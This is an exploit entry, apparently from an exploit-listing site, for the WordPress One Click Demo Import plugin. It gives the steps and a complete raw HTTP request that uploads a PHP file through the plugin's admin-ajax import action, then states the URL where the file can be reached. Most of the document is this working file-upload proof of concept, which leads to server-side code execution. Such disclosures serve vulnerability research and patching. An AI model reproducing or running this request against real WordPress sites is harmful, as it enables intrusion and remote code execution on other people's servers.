## https://sploitus.com/exploit?id=WPEX-ID:0C2E2B4D-49EB-4FD9-B9F0-3FEAE80C1082
Access Tools > Import > One Click Demo Import > Run Importer and import dummy XML file (can be empty)
Intercept the request made and change the filename as well as content:
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------18228892847416541933274753306
Content-Length: 507
Connection: close
Cookie: [admin+]
-----------------------------18228892847416541933274753306
Content-Disposition: form-data; name="action"
ocdi_upload_manual_import_files
-----------------------------18228892847416541933274753306
Content-Disposition: form-data; name="security"
e35089cb91
-----------------------------18228892847416541933274753306
Content-Disposition: form-data; name="content_file"; filename="hack.php"
Content-Type: text/xml
<?php phpinfo();?>
-----------------------------18228892847416541933274753306--
The file will be at https://example.com/wp-content/uploads/<year>/<month>/hack.php